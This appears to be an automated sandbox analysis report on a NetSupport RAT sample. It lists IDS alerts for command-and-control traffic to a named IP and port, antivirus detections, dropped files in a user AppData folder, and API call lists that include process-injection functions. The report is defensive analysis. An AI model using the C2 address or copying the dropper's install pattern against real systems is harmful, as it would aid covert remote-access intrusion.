2024-11-01T18:14:07.674268+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:07.771244+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:07.871288+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:07.971332+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:08.071359+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:08.172242+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:08.272273+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:08.373272+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:08.473338+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:08.574238+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:08.674247+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:08.774347+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:08.850668+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:44.417389+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49977	51.89.111.5	1771	TCP
2024-11-01T18:14:44.518406+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49977	51.89.111.5	1771	TCP
2024-11-01T18:14:44.618662+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49977	51.89.111.5	1771	TCP
2024-11-01T18:14:44.719432+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49977	51.89.111.5	1771	TCP
2024-11-01T18:14:44.820115+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49977	51.89.111.5	1771	TCP
2024-11-01T18:14:44.920350+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49977	51.89.111.5	1771	TCP
2024-11-01T18:14:45.022902+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49977	51.89.111.5	1771	TCP
2024-11-01T18:14:45.121438+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49977	51.89.111.5	1771	TCP
2024-11-01T18:14:45.222671+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49977	51.89.111.5	1771	TCP
2024-11-01T18:14:45.322478+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49977	51.89.111.5	1771	TCP
2024-11-01T18:14:45.422523+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49977	51.89.111.5	1771	TCP
2024-11-01T18:14:45.526509+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49977	51.89.111.5	1771	TCP
2024-11-01T18:14:45.624412+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49977	51.89.111.5	1771	TCP
2024-11-01T18:14:45.728344+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49977	51.89.111.5	1771	TCP
2024-11-01T18:14:45.824935+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49977	51.89.111.5	1771	TCP
2024-11-01T18:14:45.925430+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49977	51.89.111.5	1771	TCP
2024-11-01T18:14:46.025465+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49977	51.89.111.5	1771	TCP
2024-11-01T18:14:46.125490+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49977	51.89.111.5	1771	TCP
2024-11-01T18:14:46.326521+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49977	51.89.111.5	1771	TCP
2024-11-01T18:14:46.686446+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49977	51.89.111.5	1771	TCP
2024-11-01T18:14:46.786424+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49977	51.89.111.5	1771	TCP
2024-11-01T18:14:46.886471+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49977	51.89.111.5	1771	TCP
2024-11-01T18:14:46.988359+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49977	51.89.111.5	1771	TCP
2024-11-01T18:14:47.088463+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49977	51.89.111.5	1771	TCP
2024-11-01T18:14:47.189429+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49977	51.89.111.5	1771	TCP
2024-11-01T18:14:47.290442+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49977	51.89.111.5	1771	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: hkpqXovZtS.exe

Avira: detected

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\SuportUpWin\HTCTL32.DLL	ReversingLabs: Detection: 13%
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	ReversingLabs: Detection: 29%
Source: C:\Users\user\AppData\Roaming\SuportUpWin\remcmdstub.exe	ReversingLabs: Detection: 23%

Multi AV Scanner detection for submitted file

Source: hkpqXovZtS.exe

ReversingLabs: Detection: 52%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.3% probability

Machine Learning detection for sample

Source: hkpqXovZtS.exe

Joe Sandbox ML: detected

Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_110ADA40 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,		3_2_110ADA40
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_110ADA40 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,		11_2_110ADA40

Source: hkpqXovZtS.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\hkpqXovZtS.exe

File opened: C:\Users\user\AppData\Roaming\SuportUpWin\msvcr100.dll

Jump to behavior

Source:	Binary string: msvcr100.i386.pdb source: client32.exe, client32.exe, 0000000B.00000002.1372400954.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, msvcr100.dll.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: hkpqXovZtS.exe, 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 0000000B.00000002.1372082359.0000000011194000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: client32.exe, 00000003.00000002.3711137674.000000006E8F0000.00000002.00000001.01000000.0000000C.sdmp, HTCTL32.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\AudioCapture\Release\AudioCapture.pdb source: AudioCapture.dll.0.dr
Source:	Binary string: d:\Projects\WinRAR\SFX\build\sfxrar32\Release\sfxrar.pdb source: hkpqXovZtS.exe
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: hkpqXovZtS.exe, 00000000.00000003.1261181102.0000000006571000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\Full\pcichek.pdb source: client32.exe, 00000003.00000002.3711306367.0000000070222000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000B.00000002.1372539158.0000000070222000.00000002.00000001.01000000.0000000B.sdmp, PCICHEK.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: client32.exe, 00000003.00000002.3711137674.000000006E8F0000.00000002.00000001.01000000.0000000C.sdmp, HTCTL32.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: hkpqXovZtS.exe, 00000000.00000003.1261181102.0000000006571000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: client32.exe, 00000003.00000002.3711407321.0000000070235000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 0000000B.00000002.1372612091.0000000070235000.00000002.00000001.01000000.00000009.sdmp, pcicapi.dll.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1250\1250\client32\release_unicode\client32.pdb source: client32.exe, 00000003.00000002.3698855636.0000000000652000.00000002.00000001.01000000.00000007.sdmp, client32.exe, 00000003.00000000.1266608605.0000000000652000.00000002.00000001.01000000.00000007.sdmp, client32.exe, 0000000B.00000000.1370270714.0000000000652000.00000002.00000001.01000000.00000007.sdmp, client32.exe, 0000000B.00000002.1371512576.0000000000652000.00000002.00000001.01000000.00000007.sdmp, client32.exe.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: hkpqXovZtS.exe, 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 0000000B.00000002.1372082359.0000000011194000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.dr

Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_004093B9 FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,GetLastError,	0_2_004093B9
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_0040DB4C GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,FindFirstFileW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_0040DB4C
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_022AAFC7 FindFirstFileExW,	0_2_022AAFC7
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_111273E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,	3_2_111273E0
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_1102D9F4 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	3_2_1102D9F4
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_1102DD21 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	3_2_1102DD21
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_1110BD70 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,	3_2_1110BD70
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_110663B0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,	3_2_110663B0
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_1106ABD0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,	3_2_1106ABD0
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_6CF3EFE1 _stat32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,	3_2_6CF3EFE1
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_6CF40F84 _wstat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,	3_2_6CF40F84
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_6CF3CA9B _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,	3_2_6CF3CA9B
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_6CF40B33 _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,	3_2_6CF40B33
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_6CF3C775 _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,	3_2_6CF3C775
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_6CF40702 _wstat32,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,	3_2_6CF40702
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_6CF07C6D _wstat64i32,_wcspbrk,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,	3_2_6CF07C6D
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_6CF3FD86 _stat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,	3_2_6CF3FD86
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_1102D900 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	11_2_1102D900
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_111273E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,	11_2_111273E0
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_1110BD70 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,	11_2_1110BD70
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_110663B0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,	11_2_110663B0
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_1106ABD0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,	11_2_1106ABD0
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_6CF3EFE1 _stat32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,	11_2_6CF3EFE1
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_6CF40F84 _wstat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,	11_2_6CF40F84
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_6CF3CA9B _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,	11_2_6CF3CA9B
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_6CF40B33 _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,	11_2_6CF40B33
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_6CF3C775 _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,	11_2_6CF3C775
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_6CF40702 _wstat32,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,	11_2_6CF40702
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_6CF07C6D _wstat64i32,_wcspbrk,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,	11_2_6CF07C6D
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_6CF3FD86 _stat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,	11_2_6CF3FD86
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_6CF3DF35 _wfindfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,	11_2_6CF3DF35
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_6CF3F8B5 _stat64i32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime64_t,free,__wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,	11_2_6CF3F8B5
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_6CF3DA38 _findfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_seterrormode,SetErrorMode,	11_2_6CF3DA38

Source: C:\Users\user\Desktop\hkpqXovZtS.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	File opened: C:\Users\user\AppData	Jump to behavior

Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 4x nop then ret	0_2_004DF11C
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 4x nop then add byte ptr [edi], dh	3_2_6CEF8468
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 4x nop then add byte ptr [edi], dh	11_2_6CEF8468

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.7:49700 -> 51.89.111.5:1771
Source: Network traffic	Suricata IDS: 2035894 - Severity 1 - ET MALWARE NetSupport RAT with System Information : 192.168.2.7:49700 -> 51.89.111.5:1771
Source: Network traffic	Suricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.7:49974 -> 51.89.111.5:1771
Source: Network traffic	Suricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.7:49965 -> 51.89.111.5:1771
Source: Network traffic	Suricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.7:49976 -> 51.89.111.5:1771
Source: Network traffic	Suricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.7:49975 -> 51.89.111.5:1771
